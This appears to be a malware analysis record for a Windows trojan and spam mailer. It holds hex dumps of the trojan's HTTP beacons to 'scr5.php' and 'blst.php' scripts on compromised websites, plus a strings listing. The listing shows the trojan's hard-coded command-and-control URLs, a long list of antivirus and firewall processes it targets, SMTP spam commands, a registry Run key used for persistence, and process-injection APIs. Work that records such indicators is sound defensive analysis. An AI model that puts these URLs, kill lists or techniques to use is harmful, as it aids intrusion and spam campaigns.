0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696e68 616c742f 6d697467   GET /inhalt/mitg
0x00000010 (00016)   6c696564 65722f66 6f746f2f 626c7374   lieder/foto/blst
0x00000020 (00032)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000030 (00048)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000040 (00064)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000050 (00080)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000060 (00096)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000070 (00112)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000080 (00128)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000090 (00144)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000a0 (00160)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000b0 (00176)   3237290d 0a486f73 743a2064 69652d63   27)..Host: die-c
0x000000c0 (00192)   6c697175 65652e64 650d0a43 6f6e6e65   liquee.de..Conne
0x000000d0 (00208)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000e0 (00224)   650d0a0d 0a696f6e 3a204b65 65702d41   e....ion: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706963 2f736372 352e7068   GET /pic/scr5.ph
0x00000010 (00016)   703f703d 33373432 35266964 3d393834   p?p=37425&id=984
0x00000020 (00032)   38393336 31392048 5454502f 312e310d   893619 HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 20737a4e   .User-Agent: szN
0x00000040 (00064)   6f746966 79496465 6e740d0a 486f7374   otifyIdent..Host
0x00000050 (00080)   3a207777 772e6d65 747a6765 7265692d   : www.metzgerei-
0x00000060 (00096)   67656268 6172742e 64650d0a 0d0a612f   gebhart.de....a/
0x00000070 (00112)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000080 (00128)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000090 (00144)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000a0 (00160)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000b0 (00176)   3237290d 0a486f73 743a2064 69652d63   27)..Host: die-c
0x000000c0 (00192)   6c697175 65652e64 650d0a43 6f6e6e65   liquee.de..Conne
0x000000d0 (00208)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000e0 (00224)   650d0a0d 0a696f6e 3a204b65 65702d41   e....ion: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626f63 686d616e 6e2f696d   GET /bochmann/im
0x00000010 (00016)   61676573 2f736372 352e7068 703f703d   ages/scr5.php?p=
0x00000020 (00032)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000030 (00048)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000050 (00080)   79496465 6e740d0a 486f7374 3a207777   yIdent..Host: ww
0x00000060 (00096)   772e6665 7269656e 776f686e 756e672d   w.ferienwohnung-
0x00000070 (00112)   696e2d6d 61737572 656e2e64 650d0a0d   in-masuren.de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f6e6577 2f747261 6e736c61   GET /new/transla
0x00000010 (00016)   74696f6e 732f7363 72352e70 68703f70   tions/scr5.php?p
0x00000020 (00032)   3d333734 32352669 643d3938 34383933   =37425&id=984893
0x00000030 (00048)   36313920 48545450 2f312e31 0d0a5573   619 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2077   fyIdent..Host: w
0x00000060 (00096)   77772e61 646d6c61 772e7275 0d0a0d0a   ww.admlaw.ru....
0x00000070 (00112)   696e2d6d 61737572 656e2e64 650d0a0d   in-masuren.de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f6c6a2f 30323233 2f736372   GET /lj/0223/scr
0x00000010 (00016)   352e7068 703f703d 33373432 35266964   5.php?p=37425&id
0x00000020 (00032)   3d393834 38393336 31392048 5454502f   =984893619 HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   20737a4e 6f746966 79496465 6e740d0a    szNotifyIdent..
0x00000050 (00080)   486f7374 3a206567 6f676f2e 72750d0a   Host: egogo.ru..
0x00000060 (00096)   0d0a2e61 646d6c61 772e7275 0d0a0d0a   ...admlaw.ru....
0x00000070 (00112)   696e2d6d 61737572 656e2e64 650d0a0d   in-masuren.de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f67616c 65726965 2f746875   GET /galerie/thu
0x00000010 (00016)   6d626e61 696c732f 73637235 2e706870   mbnails/scr5.php
0x00000020 (00032)   3f703d33 37343235 2669643d 39383438   ?p=37425&id=9848
0x00000030 (00048)   39333631 39204854 54502f31 2e310d0a   93619 HTTP/1.1..
0x00000040 (00064)   55736572 2d416765 6e743a20 737a4e6f   User-Agent: szNo
0x00000050 (00080)   74696679 4964656e 740d0a48 6f73743a   tifyIdent..Host:
0x00000060 (00096)   20756e62 6f756e64 2e64650d 0a0d0a0a    unbound.de.....
0x00000070 (00112)   696e2d6d 61737572 656e2e64 650d0a0d   in-masuren.de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f736372 352e7068 703f703d   GET /scr5.php?p=
0x00000010 (00016)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000020 (00032)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000040 (00064)   79496465 6e740d0a 486f7374 3a206d63   yIdent..Host: mc
0x00000050 (00080)   2d666967 67612e64 650d0a0d 0a73743a   -figga.de....st:
0x00000060 (00096)   20756e62 6f756e64 2e64650d 0a0d0a0a    unbound.de.....
0x00000070 (00112)   696e2d6d 61737572 656e2e64 650d0a0d   in-masuren.de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f62616e 6e657273 2f736372   GET /banners/scr
0x00000010 (00016)   352e7068 703f703d 33373432 35266964   5.php?p=37425&id
0x00000020 (00032)   3d393834 38393336 31392048 5454502f   =984893619 HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   20737a4e 6f746966 79496465 6e740d0a    szNotifyIdent..
0x00000050 (00080)   486f7374 3a20696e 76657374 6578706f   Host: investexpo
0x00000060 (00096)   2e72750d 0a0d0a64 2e64650d 0a0d0a0a   .ru....d.de.....
0x00000070 (00112)   696e2d6d 61737572 656e2e64 650d0a0d   in-masuren.de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f67726f 75702f7a 6c796579   GET /group/zlyey
0x00000010 (00016)   617a796b 692f7068 6f746f73 2f736372   azyki/photos/scr
0x00000020 (00032)   352e7068 703f703d 33373432 35266964   5.php?p=37425&id
0x00000030 (00048)   3d393834 38393336 31392048 5454502f   =984893619 HTTP/
0x00000040 (00064)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000050 (00080)   20737a4e 6f746966 79496465 6e740d0a    szNotifyIdent..
0x00000060 (00096)   486f7374 3a20626c 61636b77 69646f77   Host: blackwidow
0x00000070 (00112)   2e6e736b 2e72750d 0a0d0a64 650d0a0d   .nsk.ru....de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f6b6172 74656e2f 73637235   GET /karten/scr5
0x00000010 (00016)   2e706870 3f703d33 37343235 2669643d   .php?p=37425&id=
0x00000020 (00032)   39383438 39333631 39204854 54502f31   984893619 HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000050 (00080)   6f73743a 20777777 2e656d69 6c2d7a69   ost: www.emil-zi
0x00000060 (00096)   74746175 2e64650d 0a0d0a77 69646f77   ttau.de....widow
0x00000070 (00112)   2e6e736b 2e72750d 0a0d0a64 650d0a0d   .nsk.ru....de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e74 65726e2f 73637235   GET /intern/scr5
0x00000010 (00016)   2e706870 3f703d33 37343235 2669643d   .php?p=37425&id=
0x00000020 (00032)   39383438 39333631 39204854 54502f31   984893619 HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000050 (00080)   6f73743a 20777777 2e6f7264 656e6465   ost: www.ordende
0x00000060 (00096)   736c6963 6874732e 64650d0a 0d0a6f77   slichts.de....ow
0x00000070 (00112)   2e6e736b 2e72750d 0a0d0a64 650d0a0d   .nsk.ru....de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f736572 76696365 2f636f6e   GET /service/con
0x00000010 (00016)   73747275 6374696f 6e2f7363 72352e70   struction/scr5.p
0x00000020 (00032)   68703f70 3d333734 32352669 643d3938   hp?p=37425&id=98
0x00000030 (00048)   34383933 36313920 48545450 2f312e31   4893619 HTTP/1.1
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a20737a   ..User-Agent: sz
0x00000050 (00080)   4e6f7469 66794964 656e740d 0a486f73   NotifyIdent..Hos
0x00000060 (00096)   743a2073 74726f79 696e6475 73747279   t: stroyindustry
0x00000070 (00112)   2e72750d 0a0d0a0d 0a0d0a64 650d0a0d   .ru........de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f636f6e 74726f6c 2f73656c   GET /control/sel
0x00000010 (00016)   6c2f742f 73637235 2e706870 3f703d33   l/t/scr5.php?p=3
0x00000020 (00032)   37343235 2669643d 39383438 39333631   7425&id=98489361
0x00000030 (00048)   39204854 54502f31 2e310d0a 55736572   9 HTTP/1.1..User
0x00000040 (00064)   2d416765 6e743a20 737a4e6f 74696679   -Agent: szNotify
0x00000050 (00080)   4964656e 740d0a48 6f73743a 20766c61   Ident..Host: vla
0x00000060 (00096)   647a6572 6e6f7072 6f647563 742e7275   dzernoproduct.ru
0x00000070 (00112)   0d0a0d0a 0a0d0a0d 0a0d0a64 650d0a0d   ...........de...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f67616c 65726965 2f757469   GET /galerie/uti
0x00000010 (00016)   6c2f7363 72352e70 68703f70 3d333734   l/scr5.php?p=374
0x00000020 (00032)   32352669 643d3938 34383933 36313920   25&id=984893619 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a20737a 4e6f7469 66794964   gent: szNotifyId
0x00000050 (00080)   656e740d 0a486f73 743a2068 616e6e65   ent..Host: hanne
0x00000060 (00096)   732d7761 636b6572 2e64650d 0a0d0a     s-wacker.de....

0x00000000 (00000)   47455420 2f62696c 6465722f 75706c6f   GET /bilder/uplo
0x00000010 (00016)   6164732f 73637235 2e706870 3f703d33   ads/scr5.php?p=3
0x00000020 (00032)   37343235 2669643d 39383438 39333631   7425&id=98489361
0x00000030 (00048)   39204854 54502f31 2e310d0a 55736572   9 HTTP/1.1..User
0x00000040 (00064)   2d416765 6e743a20 737a4e6f 74696679   -Agent: szNotify
0x00000050 (00080)   4964656e 740d0a48 6f73743a 20736368   Ident..Host: sch
0x00000060 (00096)   69666673 70617274 792e6465 0d0a0d0a   iffsparty.de....
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f70726f 73697465 2f706963   GET /prosite/pic
0x00000010 (00016)   732f7363 72352e70 68703f70 3d333734   s/scr5.php?p=374
0x00000020 (00032)   32352669 643d3938 34383933 36313920   25&id=984893619 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a20737a 4e6f7469 66794964   gent: szNotifyId
0x00000050 (00080)   656e740d 0a486f73 743a2073 6f756e64   ent..Host: sound
0x00000060 (00096)   2d63656c 6c2e6465 0d0a0d0a 0d0a0d0a   -cell.de........
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f636d73 2f696d67 2f736372   GET /cms/img/scr
0x00000010 (00016)   352e7068 703f703d 33373432 35266964   5.php?p=37425&id
0x00000020 (00032)   3d393834 38393336 31392048 5454502f   =984893619 HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   20737a4e 6f746966 79496465 6e740d0a    szNotifyIdent..
0x00000050 (00080)   486f7374 3a206265 726e6c6f 63686572   Host: bernlocher
0x00000060 (00096)   2e64650d 0a0d0a65 0d0a0d0a 0d0a0d0a   .de....e........
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 62616e6e   GET /images/bann
0x00000010 (00016)   65722f73 6372352e 7068703f 703d3337   er/scr5.php?p=37
0x00000020 (00032)   34323526 69643d39 38343839 33363139   425&id=984893619
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a2073 7a4e6f74 69667949   Agent: szNotifyI
0x00000050 (00080)   64656e74 0d0a486f 73743a20 7777772e   dent..Host: www.
0x00000060 (00096)   6761792d 74726166 6669632e 64650d0a   gay-traffic.de..
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6e6577 74657874 652f5f6e   GET /newtexte/_n
0x00000010 (00016)   6f746573 2f736372 352e7068 703f703d   otes/scr5.php?p=
0x00000020 (00032)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000030 (00048)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000050 (00080)   79496465 6e740d0a 486f7374 3a207777   yIdent..Host: ww
0x00000060 (00096)   772e7072 6f67616d 652e6465 0d0a0d0a   w.progame.de....
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f676573 63686963 6874652f   GET /geschichte/
0x00000010 (00016)   73637235 2e706870 3f703d33 37343235   scr5.php?p=37425
0x00000020 (00032)   2669643d 39383438 39333631 39204854   &id=984893619 HT
0x00000030 (00048)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000040 (00064)   6e743a20 737a4e6f 74696679 4964656e   nt: szNotifyIden
0x00000050 (00080)   740d0a48 6f73743a 2073742d 61676e65   t..Host: st-agne
0x00000060 (00096)   732e6465 0d0a0d0a 652e6465 0d0a0d0a   s.de....e.de....
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f736372 352e7068 703f703d   GET /scr5.php?p=
0x00000010 (00016)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000020 (00032)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000040 (00064)   79496465 6e740d0a 486f7374 3a207765   yIdent..Host: we
0x00000050 (00080)   62323938 2e736572 76657237 2e776562   b298.server7.web
0x00000060 (00096)   706c7573 32342e64 650d0a0d 0a0a0d0a   plus24.de.......
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 73637235   GET /images/scr5
0x00000010 (00016)   2e706870 3f703d33 37343235 2669643d   .php?p=37425&id=
0x00000020 (00032)   39383438 39333631 39204854 54502f31   984893619 HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000050 (00080)   6f73743a 20726f73 7a766574 6d65742e   ost: roszvetmet.
0x00000060 (00096)   636f6d0d 0a0d0a64 650d0a0d 0a0a0d0a   com....de.......
0x00000070 (00112)   0d0a0d0a                              ....


Strings
00?0W0j0
0+151C1L1W1t1z1
1.2.3.4
1q1%2I2
217.5.97.137
220 SMTP
221 closing connection
2%2.292B2T2y2
250 OK
2C3O3T3
3+3:3L3
354 waiting for data
4"4(4.444:4@4F4L4R4X4^4d4j4p4v4|4
4-6*7A7
>&>4>:>M>_>
4S6`6s6
501 syntax error
504 not implemented
5$5*50565<5B5H5N5T5Z5`5f5l5r5x5~5
5&555@5I5g5~5
?)?5?@?P?
656b6u6
:6;b;o;
/"6YAW
7'757[7
8(8-8m8~8
;*<9<{<
accept
AdjustTokenPrivileges
advapi32.dll
AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATUPDATER.EXE
ATWATCH.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVLTMAIN.EXE
AVprotect9x.exe
AVPUPD.EXE
AVSYNMGR.EXE
AVWUPD32.EXE
AVXQUAR.EXE
>%>/>A>W>a>n>w>
\ban_list.txt
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCPEVALSETUP.EXE
BIPCP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
BORG2.EXE
BS120.EXE
- (C) Copyright 1998 by ANAKiN 
CDP.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
CFINET32.EXE
CFINET.EXE
ChangeServiceConfigA
CLEANER3.EXE
CLEANER.EXE
CLEAN.EXE
CLEANPC.EXE
CloseHandle
CloseServiceHandle
closesocket
CMGRDIAN.EXE
CMON016.EXE
CoInitialize
connect
ControlService
CopyFileA
CPD.EXE
CPF9X206.EXE
CPFNT206.EXE
CreateFileA
CreateMutexA
CreateRemoteThread
CreateStreamOnHGlobal
CreateThread
CreateToolhelp32Snapshot
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
@.data
DEFWATCH.EXE
del %0
del %1
DeleteUrlCacheEntryA
DEPUTY.EXE
dfghjhn.exe
dgrfdrgffdSOFTWARE\Microsoft\Windows\CurrentVersion\RUN
die_lames555
DPF.EXE
DPFSETUP.EXE
Drvddll.exe
drvsys.exe
DRWATSON.EXE
DRWEBUPW.EXE
du-run
ENT.EXE
ererdftgrtSeDebugPrivilege
ESCANH95.EXE
ESCANHNT.EXE
ESCANV95.EXE
EXANTIVIRUS-CNET.EXE
ExitProcess
FAST.EXE
fgdfgdfggopen
fhhfdgfdh.exe
FindCloseUrlCache
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindWindowA
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FreeLibrary
FRW.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
FSAV.EXE
GBMENU.EXE
GBPOLL.EXE
GetCommandLineA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetExitCodeThread
gethostbyname
gethostname
GetLastError
GetModuleFileNameA
GetModuleHandleA
GetNetworkParams
GetPriorityClass
GetProcAddress
GetSystemDirectoryA
GetTickCount
GetVersionExA
GetWindowsDirectoryA
GetWindowThreadProcessId
gftrtghgjjgRCPT TO:<%s>
GlobalAlloc
GlobalFree
gotogotoQUIT
GUARDDOG.EXE
GUARD.EXE
HACKTRACERSETUP.EXE
HELO %s.net
HTLOG.EXE
HTTP/1.1 200 Connection established
http://artesproduction.com/scr5.php
http://avistrade.ru/prog/img/proizvod/blst.php
http://avistrade.ru/prog/img/proizvod/scr5.php
http://bernlocher.de/cms/img/scr5.php
http://blackwidow.nsk.ru/group/zlyeyazyki/photos/scr5.php
http://comdat.de/kreta/blst.php
http://dabigbadboy.de/pass/scr5.php
http://die-cliquee.de/inhalt/mitglieder/foto/blst.php
http://die-cliquee.de/inhalt/mitglieder/foto/scr5.php
http://egogo.ru/lj/0223/scr5.php
http://gaz-service.ru/img/pict/blst.php
http://gaz-service.ru/img/pict/scr5.php
http://gnet30.gamesnet.de/photogallery/photo25939/scr5.php
http://hannes-wacker.de/galerie/util/scr5.php
http://investexpo.ru/banners/scr5.php
http://komtel.spb.ru/dk/old/using/scr5.php
http://mc-figga.de/scr5.php
http://mir-auto.ru/scr5.php
http://mir-vesov.ru/p/lang/CVS/blst.php
http://mir-vesov.ru/p/lang/CVS/scr5.php
http://monomah-city.ru/vakans/blst.php
http://monomah-city.ru/vakans/scr5.php
http://multi-gaming.com/design/images/icons/scr5.php
http://partiyazerna.1gb.ru/menu/analitika/blst.php
http://partiyazerna.1gb.ru/menu/analitika/scr5.php
http://plastikp.ru/img/scr5.php
http://prizmapr.ru/test/images/blst.php
http://prizmapr.ru/test/images/scr5.php
http://promco.ru/sovrem/panorama/blst.php
http://promco.ru/sovrem/panorama/scr5.php
http://pvcps.ru/images/blst.php
http://pvcps.ru/images/scr5.php
http://rdwufa.ru/img/pict/blst.php
http://rdwufa.ru/img/pict/scr5.php
http://roszvetmet.com/images/scr5.php
http://schiffsparty.de/bilder/uploads/scr5.php
 @https://CONNECT
http://service6.valuehost.ru/images/blst.php
http://service6.valuehost.ru/images/scr5.php
http://shop-of-innovations.de/media/scr5.php
http://sound-cell.de/prosite/pics/scr5.php
http://st-agnes.de/geschichte/scr5.php
http://stroyindustry.ru/service/construction/scr5.php
http://tpoint.ru/sys/include/QuestionClasses/scr5.php
http://unbound.de/galerie/thumbnails/scr5.php
http://vladzernoproduct.ru/control/sell/t/scr5.php
http://web298.server7.webplus24.de/scr5.php
http://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/blst.php
http://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/scr5.php
http://www.admlaw.ru/new/translations/scr5.php
http://www.deadlygames.de/DG/BF/BF-Links/clans/scr5.php
http://www.emil-zittau.de/karten/scr5.php
http://www.etype.hostingcity.net/mysql_admin_new/images/scr5.php
http://www.eurostretch.ru/scr5.php
http://www.ferienwohnung-in-masuren.de/bochmann/images/scr5.php
http://www.gasterixx.de/gfx/scr5.php
http://www.gay-traffic.de/images/banner/scr5.php
http://www.hhc-online.de/home/links/pics/scr5.php
http://www.komandor.ru/sessions/scr5.php
http://www.levada.ru/htmlarea/images/scr5.php
http://www.lowenbrau.ru/manager_old/images/blst.php
http://www.lowenbrau.ru/manager_old/images/scr5.php
http://www.metzgerei-gebhart.de/pic/scr5.php
http://www.mirage.ru/sport/omega/pic/omega/scr5.php
http://www.ordendeslichts.de/intern/scr5.php
http://www.progame.de/newtexte/_notes/scr5.php
http://www.psnr.ru/rus/images/banners/blst.php
http://www.thomas-we.de/Design/blst.php
http://www.thomas-we.de/Design/scr5.php
HWPE.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSSUPPNT.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
if exist %1 goto l
IFW2000.EXE
\igfsea
inet_addr
InitializeAcl
InternetCloseHandle
InternetCrackUrlA
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
IPARMOR.EXE
iphlpapi.dll
IRIS.EXE
JAMMER.EXE
;J<e<n<y<
,JWWW6*
,JWWW/U
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-WRP-421-EN-WIN.EXE
kernel32.dll
KERNEL32.DLL
Key=1.2.3.4
KILLPROCESSSETUP161.EXE
LDPRO.EXE
listen
LoadLibraryA
LocalFree
LOCALNET.EXE
LOCKDOWN2000.EXE
LOCKDOWN.EXE
LookupPrivilegeValueA
LSETUP.EXE
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
LUALL.EXE
LUCOMSERVER.EXE
LUINIT.EXE
MAIL FROM:
MAIL FROM:<%s>
MaxIPConn=1
MCAGENT.EXE
MCUPDATE.EXE
MessageBoxA
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
Module32First
Module32Next
MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
msvcrt.dll
MSVCRT.dll
MU0311AD.EXE
NAV80TRY.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
\norat.exe
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NSCHED32.EXE
NtAllocateVirtualMemory
NtFreeVirtualMemory
NtOpenThread
NTVDM.EXE
NUPGRADE.EXE
NVARCH16.EXE
NWINST4.EXE
NWTOOL16.EXE
ole32.dll
Ole32.dll
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenServiceA
OSTRONET.EXE
OUTPOST.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PEPACK!!
 PE-PACK v1.0 -
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
Process32First
Process32Next
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
[%RAND%]
RAV8WIN32ENG.EXE
.rdata
ReadFile
ReadProcessMemory
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
REGEDIT.EXE
REGEDT32.EXE
RegisterServiceProcess
RegQueryValueExA
RegSetValueExA
ReleaseMutex
.reloc
RESCUE32.EXE
RESCUE.EXE
ResumeThread
RRGUARD.EXE
RSHELL.EXE
RtlNtStatusToDosError
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
select
SetFileAttributesA
SetLastError
SetSecurityInfo
